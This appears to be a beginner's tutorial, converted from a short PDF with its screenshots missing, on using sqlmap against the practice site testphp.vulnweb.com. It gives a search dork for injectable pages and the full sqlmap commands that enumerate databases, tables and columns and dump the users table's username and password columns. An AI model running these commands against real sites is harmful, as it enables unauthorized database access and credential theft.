SQLMAP_BASICS

Lets Start :

BASIC SQL INJECTION USING SQLMAP:

at first we have to go to our terminal and browser...

vulnweb.com
we have to type in our search box.....

as we will use mysql .....

we will click on the Acuart Link.
it will show us this...
1/3
our target is to exploit the DB of this website....

Basic Recon- we need the actual link of this page...for that ...
site:http://testphp.vulnweb.com/ php?id=
by typing this link to the search box we can get the
pages link...
suppose this is the link.. http://testphp.vulnweb.com/artists.php?artist=1

Now we can proceed for the exploitation.......

we will use sqlmap
we have to open our terminal and type...
sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 --dbs

1. at first we need to find how many db the page have.... here --dbs is for DB and -
u is for url

it will show us this..

2. Here information_schema is a default DB.
3. So, we will go with acuart...
4. sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart --tables in this command -D is
for DB as we found the DB . --tables is for how many tables are in the acuart db. it
will show us...

2/3
5. now using the same mathod we can get into the tables and columns.

sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart -T users --columns

it will show B

6. we can get the uname and pass by using this command.

sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart -T users -C uname --dump

And

sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart -T users -C pass --dump

it will dump our data into our pc's directory..

3/3